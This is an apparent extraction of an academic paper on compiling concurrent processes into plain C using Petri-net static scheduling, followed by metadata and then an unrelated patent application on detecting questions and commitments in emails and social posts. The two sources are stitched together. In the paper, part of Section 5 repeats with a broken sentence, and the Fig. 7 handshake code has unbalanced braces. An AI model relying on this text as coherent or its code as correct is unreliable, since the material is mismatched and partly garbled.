We believe that detailed processor-specific optimizations can only be achieved by optimizing code generators that have been highly optimized to a particular processor architecture. This is because modern processors employ very sophisticated pipelining and superscalar execution schemes that differ from processor to processor.
We take an intermediate approach. Our compilation procedure aims to produce, as intermediate output, plain C code that retains a high degree of parallelism so that the subsequent processor-specific code generation step can produce efficient executable machine code for the target processor.
Definition 4.4 (Static scheduling). Let \( E \) be an expansion segment. \( t_i \) is said to precede \( t_j \) in \( E \), denoted as \( t_i \prec t_j \), if there is a directed path from \( t_i \) to \( t_j \). Let \( \pi : T \rightarrow N \), be a schedule function that assigns a non-negative integer \( \pi(t) \in N \) to every \( t \in E \). A schedule is said to be valid iff it satisfies the following condition: \( \forall t_i, t_j \in E, \text{ if } t_i \prec t_j, \text{ then } \pi(t_i) < \pi(t_j) \).
To illustrate this process, consider the expansion segment shown in Fig. 5(a). A valid schedule is shown. Although this static-scheduling step is closely related to the traditional scheduling problem [19,20], we do not yet perform any detailed scheduling of instructions or any detailed resource allocation here. This is deferred to the final code generation step. However, we can make use of similar heuristics in determining a good high-level scheduling. It is not the intention of this paper to discuss in details the different possible scheduling heuristics. The interested reader can refer to [19,20] for a survey of example techniques.
Given a schedule \( \pi \), a state machine fragment \( SM_\pi \) is constructed. In contrast to the traditional scheduling problem, where typically only data-flow blocks are considered, the control-flow graph generation step is much less straightforward. This is because we can have complex concurrent conditionals where the firing of a transition is dependent on the concurrent control flow and must obey Petri net firing rules. Essentially, the control-flow graph generation step is based on a traversal of \( E \) using Petri net firing rules, but we modify the firing rules so that we proceed in accordance to the levels defined by \( \pi \). For example, the schedule shown in Fig. 5(a) will result in the state machine fragment depicted in Fig. 5(b).
In constructing the state machine fragment for the schedule, we distinguish between two types of states: anchor states and non-anchor states. They are defined as follows.
Definition 4.5 (Anchor states). Let \( E \) be an expansion with respect to an initial marking \( m_{C_i} \). \( C(E) \) be the set of cut-off
---
\( ^1 \) Here, we do not distinguish between \( p_i \) and \( p'_i \) because they simply denote different instances of the same place.
---
Fig. 5. (a) A valid static schedule; (b) corresponding state machine (control-flow graph) fragment.
markings, \( \pi : T \rightarrow N \) be the schedule function for \( E \), \( SM_\pi \) be the corresponding state machine fragment induced by \( \pi \), and \( s_1, s_2, \ldots, s_t \) be the corresponding set of states in the state machine fragment \( SM_\pi \). A state \( s_i \) is said to be an anchor state iff \( s_i = m_c \) or \( s_i \in C(E) \). It is said to be a non-anchor state otherwise.
In Fig. 5(b), anchor states are shown pictorially in double ovals, namely states \( p_1p_2 \) and \( p_3p_4 \). Once the overall state machine has been generated, it can be syntactically translated into plain C program for implementation. There are several ways to perform the syntactical mapping. One way is to use a switch-case structure, as shown below.
```c
enum {p1p2, p3p4} state = p1p2;
generate-program ( )
{
for(;;) {
switch (state) {
case p1p2:
state = p1p2;
...
state = p3p4;
break;
case p3p4:
...
state = p3p4;
break;
}
}
}
```
Using this construction, each case label corresponds to an anchor state (cut-off marking), and each case body corresponds to the code generated for the associated expansion segment. Once the overall control-flow graph has been generated, it can be syntactically translated into plain C for implementation. This last code generation step can leverage upon well-studied standard code optimization techniques [3].
### 4.4. Enhanced cut-offs
The control-flow graph generated in Section 4.1 is essentially a reachability graph for the Petri net with a modified firing rule to consider static scheduling. When traversing an expansion segment \( E \), it is possible that certain markings have already been visited when traversing earlier expansion segments. Such previously visited markings can also serve as a cut-off condition.
In particular, suppose when traversing the expansions, we add also the intermediate markings visited during the traversal to the set of reachable states \( R \) in the procedure compile above. Then we can define an enhanced cut-off criterion as follows:
**Definition 4.6 (Enhanced cut-off markings).** Let \( G \) be a Petri net, \( E \) be a maximal expansion of \( G \) with respect to the initial marking \( m \), and \( R \) be a set of markings already visited. A marking \( m_c \) is said to be an enhanced cut-off marking if it is reachable from \( m \), and either \( m \in R \) or no transitions are enabled to fire. The set of enhanced cut-offs is simply denoted as \( C(E) \).
### 4.5. Benefits
The primary benefit of our compilation procedure is the avoidance of overhead introduce by a run-time scheduler. In addition, as can be seen from the previous section, parallelism can be exploited across process boundaries. Another key benefit is the possibility of code optimization across process boundaries. In addition, our compilation procedure produces an ordinary C program that can be retargeted to different processors. For example, the C program below represents a possible solution to the example shown in Fig. 2(c) using our compilation procedure.
```c
enum {p1p2} state = p1p2;
generate-program ( )
{
int x, y, z = 0;
for(;;) {
switch (state) {
case p1p2:
x = 10;
if (x < 10)
x = 10 - x;
else
x = 10 + x;
y = x;
z = (z + y) % 345;
state = p1p2;
break;
}
}
}
```
Once generated into this form, well-studied standard code optimization techniques (e.g. constant propagation, dead-code elimination, etc.) can be applied [3]. In this case, the program can be reduced to a program that repeats
\[
z = (z + 20) \mod 345
\]
after constant propagation.
```c
generate-program ( )
{
int z = 0;
for(;;) {
z = (z + 20) % 345;
}
}
```
Recall that this example, though simple, was originally specified as two communicating processes. Such
optimizations were not possible directly at the process-level specification.
5. Compositional sequential code generation
The direct static scheduling procedure outlined in Section 4 can be summarized in Fig. 6(a). In this procedure, we compose all the processes in the system directly into a single intermediate Petri net representation. We then use static scheduling to transform the Petri net into a single sequential state machine model SM for implementation. The reason for transforming down to only a single state machine is because we need to eliminate all the run-time preemption and scheduling. The result is that there is only one program running in the system.
The static scheduling procedure is guaranteed to converge since the number of possible markings in a Petri net is finite. Hence, the number of expansions or iterations is also finite. The intermediate Petri net representation is usually comparable in size to the initial process-based specification. However, under some circumstances, the resulting state machine (representing the control flow) may be very large, hence causing the resulting C code to become very large in size as well. This problem can occur because the resulting state machine must represent explicitly the different combinations of states that the processes can be in with respect to the static schedule.
To circumvent this problem, we describe a compositional procedure that first transforms the initial input specification with respect to the static schedule. Different combinations of states that the processes can be in the resulting state machine must represent explicitly. This problem can occur because the resulting state machine must represent explicitly the different combinations of states that the processes can be in with respect to the static schedule.
To circumvent this problem, we describe a compositional procedure that first transforms the initial input specification with n processes, $P_1, P_2, \ldots, P_n$, into a set of k interacting Petri net components, $N_1, N_2, \ldots, N_k$, such that $k \leq n$. In the degenerate case, $k = n$, each process $P_i$ in the initial specification is mapped to a separate Petri net component $N_i$. We then apply our static scheduling method on each Petri net component to produce a corresponding state machine model. We then map the set of interacting state machines into a single C program for implementation. This is achieved by generating a *time-loop* in software that systematically steps through the interacting state machines without the need for a context-switching run-time operating system. This new design flow is depicted in Fig. 6(b). The choice of composition can be decided by the user through compiler directives. The default can be the degenerate case in which each process mapped to a separate Petri net component.
To facilitate communication between the interacting Petri net components, $N_1, N_2, \ldots, N_k$, we first refine the communication channels between the components using a *handshaking protocol*. The handshaking protocol is used to implement data transmission and synchronization between the components. This *handshake expansion* can be done either at the source code or Petri net level. Table 1 shows the code level expansion a possible handshaking protocol. Other handshake protocols may be used with this compositional approach.
Consider again the ping-pong example in Fig. 2. Here, we will consider the degenerate case where each process, $P_1$ and $P_2$, is mapped to its own Petri net component, $N_1$ and $N_2$, respectively. Using handshake expansion at the code level, we obtain the code in Fig. 7. Each channel is represented by a data variable as well as a handshaking variable sync used to control the channel. The sync signal represents if there is data on the channel. sync = 0 means there is no data available, vice versa. To start a receive operation, the receiver first checks if there is data on the channel by examining if sync is high. When the data are available, it will copy the data and reset sync back to low. Similarly, the send operation will first check

Fig. 6. (a) Direct approach; (b) compositional approach.

Fig. 7. Code level expansion example.
<table>
<thead>
<tr>
<th>Table 1</th>
<th>Code level handshake expansion</th>
</tr>
</thead>
<tbody>
<tr>
<td>receive</td>
<td>x = <-a; while(a_sync == 0); x = a_data; a_sync = 0;</td>
</tr>
<tr>
<td>send</td>
<td>a<- = x; while(a_sync == 1); a_data = x; a_sync = 1;</td>
</tr>
</tbody>
</table>
```plaintext
for (;;) { // x = <-a;
while (a_sync == 0);
x = a_data;
a_sync = 0;
if (x < 0) {
x = 10 - x;
} else {
x = 10 + x;
}
}
// b<= = x;
while (b_sync == 1);
b_data = x;
b_sync = 1;
}
// y = <-b;
while (b_sync == 0);
y = b_data;
b_sync = 0;
z = (z + y) % 345;
}
```
if the channel is empty (available for sending data). It will then copy the data to the channel data variable and set sync to high. Note that only one handshake control variable is needed: the sender sets the control variable and the receiver resets it.
The expanded code shown in Fig. 7 can be translated into corresponding Petri nets shown in Fig. 8. The \( \epsilon \) transitions correspond to dummy transitions. Again, this handshake expansion can be performed directly at the Petri net level. The handshaking protocol is represented as cycles in the Petri net.
After handshake expansion, each Petri net component can be scheduled into a state machine model using the static scheduling procedure. Each state machine model can then be easily translated into C code. The state machine will return control at the end of each anchor state. All the data within each state machine will be kept as global data by using hierarchical renaming schemes. Therefore, there is no context-switching involved when switching between different state machines. We can make a time-loop to simulate these state machines. At each iteration of the time-loop, all the state machines will be advanced to the next anchor state. The pseudo-code for the state machine implementation and the main time-loop is shown in Fig. 9. The explicit state machine representation acts as a built-in preemption scheme. With the help of the time-loop in the main program, the compile-code implementation eliminates the need for run-time preemption, context switching, and scheduling, which are the major performance overheads in a multi-tasking operating system.
It is important to emphasize again that the resulting program is merely an ordinary C program without any specific system calls to any underlying multi-tasking operating system or the need for one. Hence, it is highly portable and only relies on a conventional optimizing C compiler to produce the final implementation.
Since the resulting program is not intended for human processing, it need not necessarily be readable. One useful optimization is to use goto statements instead of function calls. That is, each state machine model is associated with a label. Instead of making function calls in the main time loop, goto statements are used. This can result in slightly faster implementations.
6. Degenerate case
In the degenerate case, each process is mapped to its own Petri net component. Specifically, we consider the degenerate case where each process in the initial specification is a sequential process (i.e. no par statement used internal to a process). For example, this is the case for the ping-pong example presented in Section 2. In this class of degenerate cases, we see that the resulting Petri net component after handshake expansion is actually already a state machine [15] because each transition has only one predecessor place and one successor place. While the corresponding Petri net component is already a state machine, we still need a procedure to determine which states are anchor states and which states are non-anchor states. Although the static scheduling procedure outlined in Section 4 can perform this task, we describe in this section a simple procedure that avoids the need to perform iterative expansions.
Consider the Petri net component shown in Fig. 8(a) after handshake expansion. This corresponds to the process ping described in Section 2. Note that this is a sequential model because there is only one token flowing
through the model. Starting from the initial marking shown, we identify the maximal expansion and the corresponding set of cut-off places, as shown in Fig. 10(a). Instead of an iterative expansion and scheduling procedure, we can simply use the cut-off places directly as the anchor states. This results in the state machine model shown in Fig. 10(b), where the double circles represent the anchor states. In this example, the state \( p_1 \) can be eliminated because its only output transition is a dummy transition \( \varepsilon \). The reduced state machine model is shown in Fig. 10(c). This state machine model can be syntactically mapped to C code using a switch-case structure, as described in Section 4.
It is important to note that the size of the generated state machine (e.g. Fig. 10(b)) is directly proportional to the size of the corresponding Petri net component (e.g. Fig. 8(a)), which in turn is directly proportional to the size of the initial code description of the corresponding process. This means that the size of the resulting C program is also directly proportional to the size of the original specification. Thus, this technique scales well to large applications and avoids code explosion problems.
7. Implementation and results
The compiler techniques presented in this paper has been implemented. The compiler is implemented as a pre-processor that generates plain C [1], which can then be processed by any available optimizing C compiler for a target processor to produce the executable machine code. This results in a highly portable solution. For comparisons, we implemented a multi-tasking approach using a multi-threading library as well. This multi-tasking approach is implemented using a thread library in Solaris on a Sun platform where each process is implemented as a separate thread.
To evaluate the effectiveness of our new approach, we applied it to an example derived from the RC5 encryption algorithm that is widely used for Internet security applications [21]. RC5 is a fast symmetric block cipher that is suitable for hardware or software implementations. It provides a high degree of security, but yet is exceptionally simple. A novel feature of RC5 is the heavy use of data-dependent rotations. Since a full discussion of the RC5 algorithm is beyond the scope of this paper, the interested reader is referred to [21].
The top-level view of the example is shown in Fig. 11. It consists of an encryption–decryption chain. A stream of plaintext is read via the channel \( pt \). Then the RC5 encryption algorithm is applied on it to produce a stream of ciphertext at channel \( ct \). Then the RC5 decryption algorithm is applied to the ciphertext to decode it back to plaintext again, along channel \( dt \).

Table 2
Comparing results for the RC5 encryption example on a Sun Ultra-2 running Solaris
<table>
<thead>
<tr>
<th>Size</th>
<th>Single</th>
<th>Composition</th>
<th>Threads</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.5 M</td>
<td>1.1</td>
<td>1.1</td>
<td>8.8</td>
</tr>
<tr>
<td>2 M</td>
<td>2.0</td>
<td>2.2</td>
<td>34.7</td>
</tr>
<tr>
<td>8 M</td>
<td>6.1</td>
<td>6.3</td>
<td>103.5</td>
</tr>
<tr>
<td>32 M</td>
<td>21.7</td>
<td>22.8</td>
<td>554.5</td>
</tr>
<tr>
<td>72 M</td>
<td>48.2</td>
<td>51.4</td>
<td>1241.3</td>
</tr>
<tr>
<td>512 M</td>
<td>335.9</td>
<td>360.1</td>
<td>8871.3</td>
</tr>
<tr>
<td>Rate</td>
<td>1.510 MB/s</td>
<td>1.411 MB/s</td>
<td>0.058 MB/s</td>
</tr>
</tbody>
</table>
We chose this example because it contains data-dependent loops. Table 2 compares the results generated using three methods: the static-scheduling method described in Section 4, the compositional method described in Section 5, and a multi-tasking approach using the Solaris thread library. The columns are labeled Single, Composition, and Threads, respectively. For the composition-based approach, we mapped each process to its own separate Petri net component. That is, we used the degenerate case as our composition strategy. The table compares the execution times of all three approaches on different size input streams.
The first row corresponds to a 0.5 Mbyte input file, the second row corresponds to a 2 Mbyte input file, and so on, with the largest input size of 512 Mbyte. The CPU-times are reported in seconds on a Sun Ultra-2 workstation running Solaris. The row labeled “rate” summarizes the execution of the three solutions in terms of bytes per second. Comparing CPU-times, the static-scheduling approach is comparable to the compositional approach. The Solaris thread-based implementation is slower due to the overhead introduced by multi-tasking and context switching.
8. Conclusion
We described new static compilation techniques for generating efficient implementations of concurrent programs for embedded applications. Our approach differs from previous approaches for asynchronously communicating processes in that it does not require or generate a multi-tasking run-time operating system for execution. Instead, a plain C program is synthesized at compile time that is readily retargetable to different processors. Besides producing a solution that avoids the overheads associated with a run-time operating system, our approach also makes order relations across process boundaries explicit so that partial ordering information can be exploited for optimization. Furthermore, the generated solution is highly portable since it only requires the availability of a host C compiler to support a particular processor. To circumvent potential code explosion problems, we described a compositional method. In the degenerate case, the size of the resulting C program is directly proportional to the size of the original concurrent specification. Thus, this technique scales well to large applications and is immune to code explosion problems.
References
Further reading
|
{"Source-Url": "http://cwc.ucsd.edu/~billlin/recent/integration07_concurrent.pdf", "len_cl100k_base": 9435, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 43229, "total-output-tokens": 11354, "length": "2e13", "weborganizer": {"__label__adult": 0.00045180320739746094, "__label__art_design": 0.0003807544708251953, "__label__crime_law": 0.00042057037353515625, "__label__education_jobs": 0.0004241466522216797, "__label__entertainment": 6.598234176635742e-05, "__label__fashion_beauty": 0.0001970529556274414, "__label__finance_business": 0.0002608299255371094, "__label__food_dining": 0.00044035911560058594, "__label__games": 0.0008072853088378906, "__label__hardware": 0.003795623779296875, "__label__health": 0.0005636215209960938, "__label__history": 0.0002970695495605469, "__label__home_hobbies": 0.00013744831085205078, "__label__industrial": 0.0008249282836914062, "__label__literature": 0.00020253658294677737, "__label__politics": 0.0003790855407714844, "__label__religion": 0.0006508827209472656, "__label__science_tech": 0.040008544921875, "__label__social_life": 5.8531761169433594e-05, "__label__software": 0.004276275634765625, "__label__software_dev": 0.943359375, "__label__sports_fitness": 0.0004115104675292969, "__label__transportation": 0.0011720657348632812, "__label__travel": 0.00025582313537597656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45362, 0.03911]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45362, 0.66172]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45362, 0.87886]], "google_gemma-3-12b-it_contains_pii": [[0, 3883, false], [3883, 8933, null], [8933, 12664, null], [12664, 15808, null], [15808, 18622, null], [18622, 23552, null], [23552, 27652, null], [27652, 32478, null], [32478, 35969, null], [35969, 38783, null], [38783, 44830, null], [44830, 45362, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3883, true], [3883, 8933, null], [8933, 12664, null], [12664, 15808, null], [15808, 18622, null], [18622, 23552, null], [23552, 27652, null], [27652, 32478, null], [32478, 35969, null], [35969, 38783, null], [38783, 44830, null], [44830, 45362, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45362, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45362, null]], "pdf_page_numbers": [[0, 3883, 1], [3883, 8933, 2], [8933, 12664, 3], [12664, 15808, 4], [15808, 18622, 5], [18622, 23552, 6], [23552, 27652, 7], [27652, 32478, 8], [32478, 35969, 9], [35969, 38783, 10], [38783, 44830, 11], [44830, 45362, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45362, 0.04676]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
f4d920c18bc4135e386de48b770eb9221658d014
|
A method, operating model, system, method, computer program, application, online service, or application program interface (API) Application Program Interface (API), and computer program product for analyzing any email message or text, online post, online web pages, social media sites, and online news sites to detect predefined and actionable events and intent. A method for detecting important emails or messages, and actionable emails or messages that signify intent including questions or promises. A method for detecting past or possible future events in any online posts where the event is defined a priori.
Figure 2
Figure 3
Event Definition
User Feedback
Primary Constructs
Alternate Constructs
Categorize Grammar Constructs
Extract Grammar Rules
Figure 4
Web-based demo form to drive API
<table>
<thead>
<tr>
<th>Text to analyze</th>
<th>Can you send me doc? I will send mine tomorrow. I plan to buy computer. Nice to meet you</th>
</tr>
</thead>
<tbody>
<tr>
<td>Key interest phrase</td>
<td></td>
</tr>
</tbody>
</table>
**Analysis results**
<table>
<thead>
<tr>
<th>Sentence</th>
<th>Action</th>
<th>Mood</th>
<th>Sentiment</th>
<th>Subjectivity</th>
</tr>
</thead>
<tbody>
<tr>
<td>Can you send me doc?</td>
<td>question</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
<tr>
<td>I will send mine tomorrow</td>
<td>promise</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
<tr>
<td>I plan to buy computer</td>
<td>Purchase intent</td>
<td>indicative</td>
<td>neutral</td>
<td>objective</td>
</tr>
</tbody>
</table>
Figure 5
Figure 7
Emails of Interest
User Feedback
Web Mail Contextual Plug-In
API
JSON over HTTP
User Feedback
Event Detection Analytics
Grammar Rules
Event Detection Logic
Web Application Platform
Figure 8
Figure 9
<table>
<thead>
<tr>
<th>Surface Score</th>
<th>Conversation Score</th>
<th>Content Score</th>
<th>Action Item</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>0</td>
<td>1</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>0</td>
<td>1</td>
<td>1</td>
<td>Important: †</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>0</td>
<td>FYI: ○</td>
</tr>
<tr>
<td>1</td>
<td>0</td>
<td>1</td>
<td>Important: †</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>0</td>
<td>Action Item: ‡</td>
</tr>
<tr>
<td>1</td>
<td>1</td>
<td>1</td>
<td>Action Item: ‡</td>
</tr>
</tbody>
</table>
Figure 10
## Outlook Toolbar
<table>
<thead>
<tr>
<th>From</th>
<th>Subject</th>
<th>Date</th>
<th>Cruxy Category</th>
</tr>
</thead>
<tbody>
<tr>
<td>John Doe</td>
<td>Can you do this?</td>
<td>01-01-2011</td>
<td>Action Item</td>
</tr>
<tr>
<td>Mary Jane</td>
<td>I will send this ....</td>
<td>04-01-2011</td>
<td>Commitment</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>From</th>
<th>Subject</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Scott M</td>
<td>Nice to meet you</td>
<td>04-21-2011</td>
</tr>
</tbody>
</table>
Figure 11
John Smith
Jane Doe
Jane,
Since I am in town next week, our next scheduled team meeting will be this coming Monday afternoon.
Can you make it in person?
John
Figure 12
Figure 13
Figure 14
**Figure 15**
From: Cruxy Bot (bot@cruxy.com)
To: John Doe
Cc:
Subject: Cruxy analysis
Your message with action items and promises highlighted:
I will give you a call at 1:30 pm PST on Wednesday. Do you want me to call you on your cell.
Cheers, Matt
We hope we highlighted action items and promises appropriately.
Let us know your feedback at support@cruxy.com
Thanks much
Cruxy support 303.731.2122
Cruxy v0.336 Terms & Conditions Privacy Notice
Figure 16
Gmail Conversation View
<table>
<thead>
<tr>
<th>Subject</th>
<th>Date</th>
</tr>
</thead>
<tbody>
<tr>
<td>Email 1</td>
<td>01-01.2011</td>
</tr>
<tr>
<td>Email 2</td>
<td>01-02.2011</td>
</tr>
</tbody>
</table>
Hi John Doe,
Can you send tomorrow? I will send mine tomorrow.
Thanks
Mary Jane
Cruxly Gmail Contextual Plug-in
**Questions:**
- Can you send tomorrow?
**Commitments**
- I will send mine tomorrow
Figure 17
Cruxy API Tester
Enter text to analyze
I will send the proposal out end of the day. In the meantime, please send me the customer email contact.
API Response
Action Items
In the meantime, please send me the customer email contact.
Commitments
I will send the proposal out end of the day.
Figure 18
Facebook News Feed
<table>
<thead>
<tr>
<th>Mary Jane</th>
<th>Is that Wake island? Is it on PC yet?</th>
<th>01-01.2011</th>
</tr>
</thead>
<tbody>
<tr>
<td>Samuel</td>
<td>Waiting to be released</td>
<td>01-01.2011</td>
</tr>
<tr>
<td>John Doe</td>
<td>Hello</td>
<td>01-01.2011</td>
</tr>
</tbody>
</table>
Cruxly Analysis
<table>
<thead>
<tr>
<th>Buying intent</th>
</tr>
</thead>
<tbody>
<tr>
<td>Mary Jane</td>
</tr>
<tr>
<td>Samuel</td>
</tr>
</tbody>
</table>
Figure 19
Figure 20
Figure 21
METHODS AND DEVICES FOR ANALYZING TEXT
[0001] This application claims priority to U.S. provisional application 61/467,499 for ANALYZING EMAILS AND MESSAGES TO DISCOVER IMPORTANT COMMUNICATION AND ACTIONABLE INTENT, filed on Mar. 25, 2011, which is incorporated by reference for all that is disclosed therein.
BACKGROUND
[0002] As the world has moved into an always-on, real-time mode, traditional methods of “news” or information sharing now occurs between individuals and groups using email or other messaging platforms or on websites and social media sites. The online information delivery has now overtaken the ability of traditional news services. Email, SMS, blogs, as well as social media networks, have become the early indicators of what is happening both at a personal and at the public level.
[0003] The increased speed of delivery and accessibility to news creates opportunities to better understand developing scenarios even as the growing volume of content creates challenges in sifting, filtering and identifying actionable information about the future.
[0004] While prior art has relied on descriptive and collocated keywords and frequently used keywords and a priori machine learning or training to prioritize important email messages, these approaches are limited in detecting specific events or intent. The reason is that relying on filtering based on a static set of keywords cannot comprehend that there is an intent in the message such as a question, an order, a commitment or promise, give thanks, offer apologies, etc., collectively referred to as “speech acts.”
[0005] Some recent approaches in speech act detection have employed natural language processing (NLP) which would require understanding the language and the grammar. An example of this technique is using machine learning-based classifiers for detecting some email speech acts based on prior training. These classifiers may use n-gram selection, where n-gram refers to a contiguous sequence of n items from a given sequence of text or speech such as phonemes, syllables, letters, words, etc. One implementation of this approach is an email system that can identify the speech act of each sentence in an email message and perform actions appropriate to the speech act.
[0006] The challenge in developing a general-purpose event detection system is that it has to detect not only actionable intent such as speech acts but also specific classes of event occurrence.
SUMMARY
[0007] An embodiment for analyzing text provides a system, method, a computer program, application, online service, and/or application program interface (API) for detecting predefined events or intent in any online communications from messaging texts to online web posts. This includes detecting intent such as a question or request, commitment to a request or to purchase, or detecting sensitive information, such as those related to privacy or medical information, being leaked in a message or post. Further, the event analytics engine can be customized to detect almost any class of intent or event, and therefore can be applicable to wide range of use cases from customer support to lead generation.
[0008] The event detection engine combines natural language capability with an efficient, pipelined processing architecture so as to create real time customized event detection framework. The text extracted from any source, whether a messaging platform, web page, or social media site, is parsed against predefined linguistic rules. These rules are specific to the class of events or intent that needs to be detected and codify the type of actors involved in the event and the type of action being monitored. Depending on the specific event and the use case, the detection logic can include signals such as entity name, which include persons, organizations, locations such as GPS coordinates or explicit place names, expressions of times, quantities, monetary values, percentages, etc., as well as sentiment or opinion on the entity or the text, etc.
[0009] The grammar rules are derived from the event or event class being defined. There are multiple methods to develop a corpus of sample or training data to build the event detection logic. This includes well-known primary language constructs of the event using action verbs representing the event or intent, alternate language constructs which includes constructs using synonyms of the action verbs or phrases with similar meaning as well as specialized constructs such as ad hoc idiomatic expressions. In addition, a corpus comprising examples of language constructs from actual usage instances may be used.
[0010] Once the set of language constructs have been compiled, they are analyzed for common grammar constructs to identify common n-grams sequences. As part of the analysis, verb classes, subject and object of the verbs including pronouns and implied pronouns are identified as required. The set of common n-grams and associated parts of speech values are used to create the minimal set of grammar rules required for the event detection. The minimal grammar rule set is used so that the parsing and application of grammar rules can be efficiently executed in real-time on a single computing device such as a smart mobile phone (smartphone) or a client computer such as an email client.
[0011] The final determination of whether an event of interest has been detected is embodied in an event detection logic module. The event detection logic is defined by the grammar rules in combination with event signals, which include such concepts or entities such as specific names, location or time, or event sentiment or mood or opinion, that indicate the occurrence of the event.
[0012] The accuracy of the event detection engine is improved by continually updating the grammar rules and/or the event detection logic when user feedback is available, either explicitly or implicitly.
[0013] The methods may be implemented for multiple application where event and especially intent detection is important such as: a lightweight client application for a commercial email system such as Microsoft Outlook®, a plug-in for web mail such as Gmail® or Yahoo Mail®, applications (apps) for smart phones such as BlackBerry®, iPhone® and Android®, and as a stand-alone web API such as a callabile REST/JSON API that can be offered as a service to end users or 3rd party applications.
[0014] Implementations of the event detection analytics differ depending on whether the embodiment is on an end or client device like a phone, email or tablet, or on a server as a background web service. For instance, when the analytics are for email intent detection a smartphone or computer tablet, it
can be implemented as a part of the native email client. Also, based on user feedback the client application can update its event detection analytics module to improve its accuracy. When the event detection analytics is embodied as a Web API service, then the embodiment can be hosted on a web application hosting service such as Google App Engine® or Heroku®. The API in such a case can be a REST/JSON based API that allows users to send the text to be analyzed and have the API return the detected events or intents. The underlying components of the analytics engine are the same as in the case of the email client.
BRIEF DESCRIPTION OF THE DRAWINGS
Fig. 1 is a block diagram of an embodiment of a method for analyzing text.
Fig. 2 is a block diagram of another embodiment of a method for analyzing text.
Fig. 3 is a block diagram of another embodiment of a method for analyzing text.
Fig. 4 is a flow chart describing an embodiment for the construction of grammar rules.
Fig. 5 is a diagram of an intent detection analytics on a smart phone.
Fig. 6 is a diagram of an intent detection analytics API on a web application platform.
Fig. 7 is a diagram showing intent detection in a web mail system.
Fig. 8 is an example of a web site displaying information pertaining to analyzed text using different embodiments.
Fig. 9 is a diagram of event detection within an email web robot (bot).
Fig. 10 is an embodiment of a definition table for email status flags.
Fig. 11 is an example of intent detection and tracking displayed in an email client.
Fig. 12 is an example of a flagged email message having a question within the message.
Fig. 13 is an example of flagged email messages having Questions and Commitments within the messages.
Fig. 14 is an embodiment of email folders organized by detected intent.
Fig. 15 is an embodiment of a display of important contacts related to emails.
Fig. 16 is an embodiment of an intent detection email bot.
Fig. 17 is an embodiment of an intent detection plug-in for web mail.
Fig. 18 is an embodiment of API based implementation of intent detection.
Fig. 19 is an embodiment of event detection on a social media website.
Fig. 20 is an embodiment of a dashboard showing intent detection and tracking in customer and support personnel emails.
Fig. 21 is a special purpose computer system configured with an event detection system according to one embodiment.
DETAILED DESCRIPTION OF THE EMBODIMENTS
Analyzing text to detect events of interest relies on analyzing related data from many sources and using methods as described herein for specific purposes. With large scale search and data mining capabilities it is possible to find minuscule mentions of subtle indications about what is to come and detect early signals of such events. A related problem is how to detect specific events that one expects to occur, or detect a possible event by detecting a person’s intent from the messages or online information sources.
Examples of event detection of practical interest include detecting intent such as questions and commitments in messages from within personal to business emails for increasing productivity, managing customer relationships in service organizations, generate sales leads, manage and create marketing campaigns, and analyze and segment customer data for product and service development.
This application describes a method for analyzing messaging and online posts to detect the occurrence of a pre-defined event including a possible future event based on detecting certain context and conditions. The method can be applied to filter large amounts of online information and detect specific events from any online source and on any client device, from desktops to computer tablets and smartphones.
FIG. 1 shows a general event detection system for the devices and methods described herein. As shown, the method works for any text provided from any source including email and messages from a messaging application like chat or instant messaging (IM), data posted on a web site or blog, and social media sites such as Facebook® or Twitter®. Text is extracted from these sources by the Text Extraction module 100 and then passed to the event detection analytics module 105. The event detection analytics module may include at least the following primary components: natural language processing (NLP) unit 110, event detection unit 120, grammar rules unit 130, event signals unit 140 and the event detection logic unit 150.
Once the text has been extracted 100 from the source, the NLP unit 110 applies the following steps as shown in FIG. 2. In the first step 201, the text is tokenized or the body of the extracted text is broken down to units referred to as “tokens” which may be words or numbers or punctuation marks. Tokenization does this task by locating word boundaries. Tokenization thus identifies all words in the text.
In the second step, the tokenized text is segmented 202. Segmentation divides the string of text units into its component sentences or the stand-alone phrases. Typically, in English and similar languages, punctuation marks such as period or full stop or semi-colon characters are used to denote the end of a sentence or stand-alone phrase.
